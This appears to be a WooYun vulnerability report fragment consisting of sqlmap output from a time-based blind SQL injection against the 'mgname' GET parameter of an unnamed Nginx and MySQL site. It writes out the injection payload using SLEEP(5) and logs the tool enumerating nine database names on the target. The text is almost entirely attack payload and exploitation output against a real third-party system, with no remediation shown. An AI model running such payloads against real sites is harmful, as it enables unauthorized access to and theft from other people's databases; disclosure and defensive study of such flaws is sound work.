WooYun.org

Place: GET
Parameter: mgname
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: mgname=lqjx' AND SLEEP(5) AND 'IWOZ'='IWOZ
---
[18:54:59] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11
[18:54:59] [INFO] fetching database names
[18:54:59] [INFO] fetching number of databases
[18:54:59] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[18:57:29] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[18:57:50] [INFO] adjusting time delay to 1 second due to good response times
9
[18:57:52] [INFO] retrieved:
[18:58:04] [ERROR] invalid character detected. retrying..
[18:58:04] [WARNING] increasing time delay to 2 seconds
inform
[19:00:18] [ERROR] invalid character detected. retrying..
[19:00:18] [WARNING] increasing time delay to 3 seconds
at
[19:01:34] [ERROR] invalid character detected. retrying..
[19:01:34] [WARNING] increasing time delay to 4 seconds
ion_schema
[19:07:19] [INFO] retrieved: comment
[19:11:35] [INFO] retrieved: ismp
[19:14:05] [INFO] retrieved: mysql
[19:17:03] [INFO] retrieved: notification
[19:24:05] [INFO] retrieved: performance_schema
[19:34:13] [INFO] retrieved: publish
[19:38:37] [INFO] retrieved: qa
[19:39:25] [INFO] retrieved: sh
[19:41:23] [ERROR] invalid character detected. retrying..
[19:41:23] [WARNING] increasing time delay to 5 seconds
iwan
available databases [9]:
[*] comment
[*] information_schema
[*] ismp
[*] mysql
[*] notification
[*] performance_schema
[*] publish
[*] qa
[*] shiwan